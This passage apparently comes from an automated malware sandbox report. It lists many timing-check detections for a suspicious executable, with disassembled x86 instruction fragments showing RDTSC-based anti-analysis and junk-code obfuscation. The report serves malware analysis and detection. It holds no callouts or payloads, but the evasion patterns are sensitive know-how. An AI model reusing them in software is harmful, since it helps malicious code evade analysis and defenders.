0x00000060 ja 00007F528074EBD6h 0x00000066 pop esi 0x00000067 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A29EDF second address: A29EE9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F528105F326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A29EE9 second address: A29EF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F528074EBD6h 0x0000000a rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A3B99B second address: A3B99F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A4840E second address: A48412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A48412 second address: A48442 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528105F334h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F528105F334h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A48580 second address: A48599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F528074EBE3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A48599 second address: A485A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A48B22 second address: A48B28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A48CA8 second address: A48CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A48DF3 second address: A48DF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A48F55 second address: A48F7C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F528105F326h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d jc 00007F528105F342h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F528105F332h 0x0000001a rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A490D9 second address: A490DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A49946 second address: A49964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F528105F337h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A49964 second address: A4997B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F528074EBD6h 0x0000000a jmp 00007F528074EBDDh 0x0000000f rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A49C08 second address: A49C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F528105F330h 0x00000009 pop eax 0x0000000a jl 00007F528105F32Eh 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A49F3D second address: A49F7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F528074EBEEh 0x0000000b jmp 00007F528074EBE6h 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F528074EBE4h 0x0000001d rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A4D14B second address: A4D151 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A4D151 second address: A4D156 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A4D156 second address: A4D15C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A4D5AF second address: A4D5B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A4D5B3 second address: A4D5B9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A4D5B9 second address: A4D5E6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F528074EBDCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F528074EBE9h 0x00000013 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A4C74E second address: A4C75A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push ecx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A54247 second address: A5424C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A53694 second address: A53698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A53698 second address: A536B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528074EBE5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A536B1 second address: A536CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F528105F32Ah 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F528105F328h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A536CC second address: A536DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F528074EBD6h 0x0000000a jng 00007F528074EBD6h 0x00000010 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A53F29 second address: A53F2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A53F2D second address: A53F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F528074EBD6h 0x00000010 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A53F3D second address: A53F41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A5408C second address: A54093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A54093 second address: A54099 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A54099 second address: A5409D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A5409D second address: A540B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F528105F32Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A540B8 second address: A540BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A540BC second address: A540E2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d jmp 00007F528105F338h 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A540E2 second address: A540E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A55CFE second address: A55D13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528105F32Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A56A9D second address: A56AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A56AA1 second address: A56ABD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528105F338h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A56DAD second address: A56DC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F528074EBE3h 0x00000009 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A56DC4 second address: A56DD6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a je 00007F528105F32Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A56DD6 second address: A56DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A57334 second address: A57338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A57338 second address: A5735C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F528074EBD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F528074EBE6h 0x00000013 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A5735C second address: A573CD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F528105F328h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F528105F328h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 sub dword ptr [ebp+122D2525h], ebx 0x0000002d push 00000000h 0x0000002f sub edi, 333BFDB1h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edi 0x0000003a call 00007F528105F328h 0x0000003f pop edi 0x00000040 mov dword ptr [esp+04h], edi 0x00000044 add dword ptr [esp+04h], 00000018h 0x0000004c inc edi 0x0000004d push edi 0x0000004e ret 0x0000004f pop edi 0x00000050 ret 0x00000051 cld 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F528105F32Ch 0x0000005a rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A5ACC3 second address: A5AD48 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F528074EBDBh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F528074EBD8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov edi, ebx 0x0000002a sub dword ptr [ebp+122D33A4h], ebx 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007F528074EBD8h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 00000015h 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c jno 00007F528074EBD6h 0x00000052 push 00000000h 0x00000054 jmp 00007F528074EBE8h 0x00000059 xchg eax, ebx 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d push esi 0x0000005e pop esi 0x0000005f ja 00007F528074EBD6h 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A5AD48 second address: A5AD6E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F528105F33Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A5AD6E second address: A5AD72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A5C2AE second address: A5C2C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F528105F32Dh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A5E058 second address: A5E077 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F528074EBE3h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A584F8 second address: A584FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A584FD second address: A58504 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A58504 second address: A5851D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jmp 00007F528105F32Dh 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A60B0A second address: A60B0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A60B0E second address: A60B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jns 00007F528105F334h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F528105F32Ah 0x00000015 popad 0x00000016 nop 0x00000017 push ecx 0x00000018 mov dword ptr [ebp+122D1CD5h], esi 0x0000001e pop ebx 0x0000001f jmp 00007F528105F32Eh 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push edi 0x00000029 call 00007F528105F328h 0x0000002e pop edi 0x0000002f mov dword ptr [esp+04h], edi 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc edi 0x0000003c push edi 0x0000003d ret 0x0000003e pop edi 0x0000003f ret 0x00000040 and ebx, 3286BB64h 0x00000046 push 00000000h 0x00000048 mov di, 4CA4h 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 push edi 0x00000051 pop edi 0x00000052 je 00007F528105F326h 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A60B80 second address: A60B95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F528074EBDCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A60B95 second address: A60B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A60B99 second address: A60B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A60B9F second address: A60BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A60BA3 second address: A60BA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A61B46 second address: A61BC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F528105F32Eh 0x00000008 js 00007F528105F326h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F528105F328h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edx 0x00000033 call 00007F528105F328h 0x00000038 pop edx 0x00000039 mov dword ptr [esp+04h], edx 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc edx 0x00000046 push edx 0x00000047 ret 0x00000048 pop edx 0x00000049 ret 0x0000004a add dword ptr [ebp+122D36A2h], ecx 0x00000050 push 00000000h 0x00000052 cmc 0x00000053 mov ebx, ecx 0x00000055 xchg eax, esi 0x00000056 jmp 00007F528105F32Ah 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 push edi 0x00000061 pop edi 0x00000062 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A61BC0 second address: A61BC6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A61BC6 second address: A61BD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F528105F32Fh 0x00000009 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A62B24 second address: A62B28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A62B28 second address: A62B34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A62B34 second address: A62BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007F528074EBD8h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ecx 0x00000026 call 00007F528074EBD8h 0x0000002b pop ecx 0x0000002c mov dword ptr [esp+04h], ecx 0x00000030 add dword ptr [esp+04h], 00000019h 0x00000038 inc ecx 0x00000039 push ecx 0x0000003a ret 0x0000003b pop ecx 0x0000003c ret 0x0000003d push edx 0x0000003e mov dword ptr [ebp+124678EEh], edx 0x00000044 pop ebx 0x00000045 mov edi, dword ptr [ebp+122D3528h] 0x0000004b push 00000000h 0x0000004d jnp 00007F528074EBDAh 0x00000053 mov bx, 916Ah 0x00000057 push eax 0x00000058 pushad 0x00000059 push ecx 0x0000005a jnl 00007F528074EBD6h 0x00000060 pop ecx 0x00000061 pushad 0x00000062 pushad 0x00000063 popad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A63B38 second address: A63B4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jnp 00007F528105F328h 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A64C9A second address: A64CA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A65CCA second address: A65CD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A65CD0 second address: A65D75 instructions: 0x00000000 rdtsc 0x00000002 je 00007F528074EBD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F528074EBD8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 call 00007F528074EBDCh 0x0000002c sub edi, dword ptr [ebp+122D3B74h] 0x00000032 pop edi 0x00000033 push 00000000h 0x00000035 pushad 0x00000036 and ecx, dword ptr [ebp+122D21EEh] 0x0000003c jmp 00007F528074EBE2h 0x00000041 popad 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push ebx 0x00000047 call 00007F528074EBD8h 0x0000004c pop ebx 0x0000004d mov dword ptr [esp+04h], ebx 0x00000051 add dword ptr [esp+04h], 0000001Dh 0x00000059 inc ebx 0x0000005a push ebx 0x0000005b ret 0x0000005c pop ebx 0x0000005d ret 0x0000005e sub ebx, 79155900h 0x00000064 jg 00007F528074EBDCh 0x0000006a adc ebx, 056129ADh 0x00000070 xchg eax, esi 0x00000071 push eax 0x00000072 push edx 0x00000073 push eax 0x00000074 push edx 0x00000075 jnc 00007F528074EBD6h 0x0000007b rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A65D75 second address: A65D7F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F528105F326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A66E5B second address: A66E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A66E5F second address: A66E95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528105F338h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F528105F333h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A66E95 second address: A66E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A67F59 second address: A67F60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
